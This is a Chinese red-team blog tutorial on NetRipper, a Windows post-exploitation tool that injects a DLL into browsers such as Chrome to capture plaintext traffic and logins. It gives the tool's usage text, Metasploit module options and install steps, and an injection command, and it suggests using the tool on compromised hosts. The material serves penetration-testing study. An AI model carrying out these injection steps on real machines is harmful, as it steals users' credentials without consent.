<!DOCTYPE html>
<html lang=zh>
<head><meta name="generator" content="Hexo 3.9.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="红队攻防之获取内存中的密码 0X01 NetRipperNetRipper是针对Windows系统的后期开发工具，其使用API挂钩来拦截低特权用户的网络流量和与加密相关的功能，从而能够在加密之前/解密之后捕获纯文本流量和加密流量。 0X02 用法12345678910111213141516Injection: NetRipper.exe DLLpath.dll processname.exe">
<meta property="og:type" content="article">
<meta property="og:title" content="红队攻防之获取内存中的密码">
<meta property="og:url" content="http://lilifengcode.github.io/post/39cded73.html">
<meta property="og:site_name" content="裁决的博客">
<meta property="og:description" content="红队攻防之获取内存中的密码 0X01 NetRipperNetRipper是针对Windows系统的后期开发工具，其使用API挂钩来拦截低特权用户的网络流量和与加密相关的功能，从而能够在加密之前/解密之后捕获纯文本流量和加密流量。 0X02 用法12345678910111213141516Injection: NetRipper.exe DLLpath.dll processname.exe">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/28/ZMdqxS.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/29/u82SNF.gif">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/29/u82QgA.gif">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/29/u8WkTK.gif">
<meta property="og:updated_time" content="2019-10-31T13:44:18.643Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="红队攻防之获取内存中的密码">
<meta name="twitter:description" content="红队攻防之获取内存中的密码 0X01 NetRipperNetRipper是针对Windows系统的后期开发工具，其使用API挂钩来拦截低特权用户的网络流量和与加密相关的功能，从而能够在加密之前/解密之后捕获纯文本流量和加密流量。 0X02 用法12345678910111213141516Injection: NetRipper.exe DLLpath.dll processname.exe">
<meta name="twitter:image" content="https://s2.ax1x.com/2019/06/28/ZMdqxS.jpg">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>红队攻防之获取内存中的密码</title>
    <!-- styles -->
    <link rel="stylesheet" href="/css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="/css/rtl.css">
    
    <!-- rss -->
    
    
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/lilifengcode">项目</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/post/f1dbfde2.html"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/post/ac384f73.html"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://lilifengcode.github.io/post/39cded73.html"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://lilifengcode.github.io/post/39cded73.html&text=红队攻防之获取内存中的密码"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://lilifengcode.github.io/post/39cded73.html&title=红队攻防之获取内存中的密码"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://lilifengcode.github.io/post/39cded73.html&is_video=false&description=红队攻防之获取内存中的密码"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=红队攻防之获取内存中的密码&body=Check out this article: http://lilifengcode.github.io/post/39cded73.html"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://lilifengcode.github.io/post/39cded73.html&title=红队攻防之获取内存中的密码"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://lilifengcode.github.io/post/39cded73.html&title=红队攻防之获取内存中的密码"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://lilifengcode.github.io/post/39cded73.html&title=红队攻防之获取内存中的密码"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://lilifengcode.github.io/post/39cded73.html&title=红队攻防之获取内存中的密码"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://lilifengcode.github.io/post/39cded73.html&name=红队攻防之获取内存中的密码&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#红队攻防之获取内存中的密码"><span class="toc-number">1.</span> <span class="toc-text">红队攻防之获取内存中的密码</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0X01-NetRipper"><span class="toc-number">1.1.</span> <span class="toc-text">0X01 NetRipper</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0X02-用法"><span class="toc-number">1.2.</span> <span class="toc-text">0X02 用法</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Metasploit模块"><span class="toc-number">1.2.1.</span> <span class="toc-text">Metasploit模块</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Metasploit安装（Kali）"><span class="toc-number">1.2.2.</span> <span class="toc-text">Metasploit安装（Kali）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Metasploit安装（后备箱）"><span class="toc-number">1.2.2.1.</span> <span class="toc-text">Metasploit安装（后备箱）</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-操作演示"><span class="toc-number">1.3.</span> <span class="toc-text">0x03  操作演示</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-思路"><span class="toc-number">1.4.</span> <span class="toc-text">0x04 思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-参考项目主页"><span class="toc-number">1.5.</span> <span class="toc-text">0x05 参考项目主页</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        红队攻防之获取内存中的密码
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">裁决的博客</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2019-10-31T13:42:19.000Z" itemprop="datePublished">2019-10-31</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="红队攻防之获取内存中的密码"><a href="#红队攻防之获取内存中的密码" class="headerlink" title="红队攻防之获取内存中的密码"></a>红队攻防之获取内存中的密码</h1><p><img src="https://s2.ax1x.com/2019/06/28/ZMdqxS.jpg" alt="ZMdqxS.jpg"></p>
<h2 id="0X01-NetRipper"><a href="#0X01-NetRipper" class="headerlink" title="0X01 NetRipper"></a>0X01 NetRipper</h2><p>NetRipper是针对Windows系统的后期开发工具，其使用API挂钩来拦截低特权用户的网络流量和与加密相关的功能，从而能够在加密之前/解密之后捕获纯文本流量和加密流量。</p>
<h2 id="0X02-用法"><a href="#0X02-用法" class="headerlink" title="0X02 用法"></a>0X02 用法</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">Injection: NetRipper.exe DLLpath.dll processname.exe  </span><br><span class="line">Example:   NetRipper.exe DLL.dll firefox.exe  </span><br><span class="line"></span><br><span class="line">Generate DLL:</span><br><span class="line"></span><br><span class="line">  -h,  --help          Print this help message  </span><br><span class="line">  -w,  --write         Full path for the DLL to write the configuration data  </span><br><span class="line">  -l,  --location      Full path where to save data files (default TEMP)  </span><br><span class="line"></span><br><span class="line">Plugins:</span><br><span class="line"></span><br><span class="line">  -p,  --plaintext     Capture only plain-text data. E.g. true  </span><br><span class="line">  -d,  --datalimit     Limit capture size per request. E.g. 4096  </span><br><span class="line">  -s,  --stringfinder  Find specific strings. E.g. user,pass,config  </span><br><span class="line"></span><br><span class="line">Example: NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096 -s user,pass</span><br></pre></td></tr></table></figure>

<h3 id="Metasploit模块"><a href="#Metasploit模块" class="headerlink" title="Metasploit模块"></a>Metasploit模块</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">msf exploit(multi/handler) &gt; use post/windows/gather/netripper/netripper </span><br><span class="line">msf post(windows/gather/netripper/netripper) &gt; show options</span><br><span class="line"></span><br><span class="line">Module options (post/windows/gather/netripper/netripper):</span><br><span class="line"></span><br><span class="line">   Name          Current Setting  Required  Description</span><br><span class="line">   ----          ---------------  --------  -----------</span><br><span class="line">   DATALIMIT     65535            no        The number of bytes to save from requests/responses</span><br><span class="line">   DATAPATH      TEMP             no        Where to save files. E.g. C:\Windows\Temp or TEMP</span><br><span class="line">   DLLPATH                        no        Where to find NetRipper DLLs. Default is /usr/share/metasploit-framework...</span><br><span class="line">   PLAINTEXT     false            no        True to save only plain-text data</span><br><span class="line">   PROCESSIDS                     no        Process IDs. E.g. 1244,1256</span><br><span class="line">   PROCESSNAMES                   no        Process names. E.g. firefox.exe,chrome.exe</span><br><span class="line">   SESSION                        yes       The session to run this module on.</span><br><span class="line">   STRINGFINDER  DEFAULT          no        Search for specific strings in captured data</span><br></pre></td></tr></table></figure>

<p>设置PROCESSNAMES或PROCESSIDS并运行。</p>
<h3 id="Metasploit安装（Kali）"><a href="#Metasploit安装（Kali）" class="headerlink" title="Metasploit安装（Kali）"></a>Metasploit安装（Kali）</h3><ol>
<li>mkdir / usr / share / metasploit-framework / modules / post / windows / gather / netripper</li>
<li>cp Metasploit / netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper.rb</li>
<li>cp x86 / DLL.x86.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.x86.dll</li>
<li>cp x64 / DLL.x64.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.x64.dll</li>
</ol>
<h4 id="Metasploit安装（后备箱）"><a href="#Metasploit安装（后备箱）" class="headerlink" title="Metasploit安装（后备箱）"></a>Metasploit安装（后备箱）</h4><ol>
<li>mkdir / opt / metasploit-framework / modules / post / windows / gather / netripper</li>
<li>cp Metasploit / netripper.rb /opt/metasploit-framework/modules/post/windows/gather/netripper/netripper.rb</li>
<li>cp x86 / DLL.x86.dll /opt/metasploit-framework/modules/post/windows/gather/netripper/DLL.x86.dll</li>
<li>cp x64 / DLL.x64.dll /opt/metasploit-framework/modules/post/windows/gather/netripper/DLL.x64.dll</li>
</ol>
<h2 id="0x03-操作演示"><a href="#0x03-操作演示" class="headerlink" title="0x03  操作演示"></a>0x03  操作演示</h2><p>执行命令，将DLL文件注入到chrome浏览器里</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">NetRipper.x64.exe &quot;C:\Users\ailishi\Downloads\NetRipper-master\x64\DLL.x64.dll&quot; chrome.exe</span><br></pre></td></tr></table></figure>

<p>登录一个网站就行</p>
<p><img src="https://s2.ax1x.com/2019/09/29/u82SNF.gif" alt="img"></p>
<p>登录一个网站就行，查看temp</p>
<p><img src="https://s2.ax1x.com/2019/09/29/u82QgA.gif" alt="img"></p>
<p>通过POWERSHELL也行</p>
<p><img src="https://s2.ax1x.com/2019/09/29/u8WkTK.gif" alt="img"></p>
<h2 id="0x04-思路"><a href="#0x04-思路" class="headerlink" title="0x04 思路"></a><strong>0x04 思路</strong></h2><p>可以在入侵主机上注入进程进而获取重要信息，可以结合MSF进行操作</p>
<h2 id="0x05-参考项目主页"><a href="#0x05-参考项目主页" class="headerlink" title="0x05 参考项目主页"></a><strong>0x05 参考项目主页</strong></h2><p><a href="https://github.com/NytroRST/NetRipper" target="_blank" rel="noopener">https://github.com/NytroRST/NetRipper</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/lilifengcode">项目</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#红队攻防之获取内存中的密码"><span class="toc-number">1.</span> <span class="toc-text">红队攻防之获取内存中的密码</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0X01-NetRipper"><span class="toc-number">1.1.</span> <span class="toc-text">0X01 NetRipper</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0X02-用法"><span class="toc-number">1.2.</span> <span class="toc-text">0X02 用法</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Metasploit模块"><span class="toc-number">1.2.1.</span> <span class="toc-text">Metasploit模块</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Metasploit安装（Kali）"><span class="toc-number">1.2.2.</span> <span class="toc-text">Metasploit安装（Kali）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Metasploit安装（后备箱）"><span class="toc-number">1.2.2.1.</span> <span class="toc-text">Metasploit安装（后备箱）</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-操作演示"><span class="toc-number">1.3.</span> <span class="toc-text">0x03  操作演示</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-思路"><span class="toc-number">1.4.</span> <span class="toc-text">0x04 思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-参考项目主页"><span class="toc-number">1.5.</span> <span class="toc-text">0x05 参考项目主页</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://lilifengcode.github.io/post/39cded73.html"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://lilifengcode.github.io/post/39cded73.html&text=红队攻防之获取内存中的密码"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://lilifengcode.github.io/post/39cded73.html&title=红队攻防之获取内存中的密码"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://lilifengcode.github.io/post/39cded73.html&is_video=false&description=红队攻防之获取内存中的密码"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=红队攻防之获取内存中的密码&body=Check out this article: http://lilifengcode.github.io/post/39cded73.html"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://lilifengcode.github.io/post/39cded73.html&title=红队攻防之获取内存中的密码"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://lilifengcode.github.io/post/39cded73.html&title=红队攻防之获取内存中的密码"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://lilifengcode.github.io/post/39cded73.html&title=红队攻防之获取内存中的密码"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://lilifengcode.github.io/post/39cded73.html&title=红队攻防之获取内存中的密码"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://lilifengcode.github.io/post/39cded73.html&name=红队攻防之获取内存中的密码&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2019 裁决
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/lilifengcode">项目</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

    <!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
